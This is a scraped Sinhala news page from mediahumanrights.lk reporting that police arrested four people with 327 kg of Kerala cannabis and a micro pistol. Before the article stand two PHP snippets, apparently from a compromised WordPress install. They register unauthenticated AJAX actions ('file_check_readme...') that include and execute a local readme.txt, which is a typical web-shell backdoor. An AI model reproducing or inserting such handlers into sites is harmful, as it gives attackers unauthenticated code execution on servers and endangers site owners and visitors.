if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කේරල ගංජා කිලෝ 327ක් සහ පිස්තෝලයක් සමග සිවුදෙනෙකු අත්අඩංගුවට - mediahumanrights.lk
mediahumanrights.lk
Local News News

කේරල ගංජා කිලෝ 327ක් සහ පිස්තෝලයක් සමග සිවුදෙනෙකු අත්අඩංගුවට

කේරළ ගංජා කිලෝ ග‍්‍රෑම් 327ක් සමග පුද්ගලයන් සිව්දෙනෙකු කැළණිමුල්ල ප‍්‍රදේශයේදී අත්අඩංගුවට ගෙන තිබෙනවා.
ඒ, පොලිස් විශේෂ කාර්ය බලකාය කළ  වැටලීමකදීයි.
පළමුව සැකකරුවන් තිදෙනෙකු අත්අඩංගුවට ගැණුනා.
ඔවුන්ගේ ජංගම දුරතකතන පරික්ෂා කිරිමේදී සැකකටයුතු තවත් පුද්ගලයෙකු සම්බන්ධයෙන් තොරතුරු අනාවරණ වී තිබෙනවා.
පසුව කළ වැටලිමකදි අදාළ සැකකරුද තොටළඟ ප‍්‍රදේශයේදී අත්අඩංගුවට ගැණුනා.
ඔහු සතුව තිබී මයික්‍රෝ වර්ගයේ පිස්තෝලයක් සොයා ගෙන තිබෙනවා.
සැකකරුවන් අධිකරණය හමුවට ඉදිරිපත් කිරීමට නියමිතයි.
(under the courtesy of nethfm news web)

Related posts

ගාළු කොටුවේ විරෝධතා විසුරුවේ පිතිකරුවන්ට බාධා වන නිසා…- Army

Shiran Viraj

ඩොලර් නෑ.. අත්‍යවශ්‍ය ආහාර ද‍්‍රව්‍ය දැඩි හිගයක්… මිලත් ඉහලට..

Shiran Viraj

එංගලන්තයට ලකුණු 87 ක ජයක්

Shiran Viraj